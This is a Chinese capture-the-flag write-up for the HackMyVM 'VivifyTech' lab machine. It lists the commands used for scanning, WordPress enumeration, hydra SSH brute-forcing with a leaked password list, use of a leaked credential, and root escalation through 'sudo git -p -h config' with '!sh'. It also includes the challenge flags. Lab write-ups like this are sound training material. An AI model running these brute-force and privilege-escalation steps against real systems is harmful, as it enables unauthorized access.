目录
一、测试环境
1、系统环境
渗透机:kali2021.1(192.168.101.127)
靶 机:debian(192.168.101.109)
注意事项:
①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。
②靶机启动失败:设置中取消勾选usb即可
2、使用工具/软件
Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、cmseek(探测cms信息)、hydra(爆破ssh登录)、ssh(远程连接)
测试网址:http://192.168.101.109
靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。
地址:https://hackmyvm.eu/machines/machine.php?vm=VivifyTech
二、测试目的
练习渗透思路,熟悉git提权命令。
三、操作过程
1、信息搜集
主机探测
arp-scan -l
靶机IP:192.168.101.109
物理机IP:192.168.101.241
端口和服务探测
nmap -sT -A -p- -T4 192.168.101.109
开放了22端口(ssh服务)、80端口(web服务)、3306服务(MySQL服务)、33060端口
目录扫描
gobuster dir -u http://192.168.101.109 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt
可以看到存在wordpress服务
扫描wordpress目录
存在很多目录
gobuster dir -u http://192.168.101.109/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt
收集wordpress信息
cmseek -u http://192.168.101.109/wordpress
找到一个用户名:sancelisso
在wordpress目录主页
下方有个看、读、听的模块
在这个故事中,有几个人名,是后面需要用到的
Sarah、Mark、Emily、Jake
在wordpress的wp-includes目录中泄露了很多源码
并且有secret密码文档
2、Getshell
将密码文档下载,尝试爆破sancelisso用户的密码
wpscan --url http://192.168.101.109/wordpress/ -U sancelisso -P secrets.txt
爆破失败了,看来这不是wordpress的密码
记得那四个人名吗?
尝试使用它作为用户名,爆破ssh登录,密码就使用secrets.txt
需要注意的是:用户名要小写才能爆破成功
vim user.txt
cat user.txt
hydra -L user.txt -P secrets.txt ssh://192.168.101.109 -I -f
尝试ssh登录靶机,爆破成功
ssh sarah@192.168.101.109
可以在家目录看到user.txt : HMV{Y0u_G07_Th15_0ne_6543}
ls -la
cat user.txt
3、提权
可以在Sarah的家目录发现两个隐藏目录
在.private目录中有一个Tasks.txt文件,提到了一个用户gbodja并且给出了密码,而且说这个用户有任务上的信任
cd .private/
cat Tasks.txt
gbodja:4Tch055ouy370N
切换到gbodja用户,成功切换
su gbodja
查看sudo权限发现,果然这个用户有特权,该用户可以sudo执行git命令
sudo -l
查看git命令提权的文档:git | GTFOBins https://gtfobins.github.io/gtfobins/git/
只需要进入交互式界面,输入!sh即可提权
sudo git -p -h config
!sh
cd
cat root.txt
可以看到root.txt:HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
四、结论
知道了git工具sudo提权的方法,熟悉了渗透思路。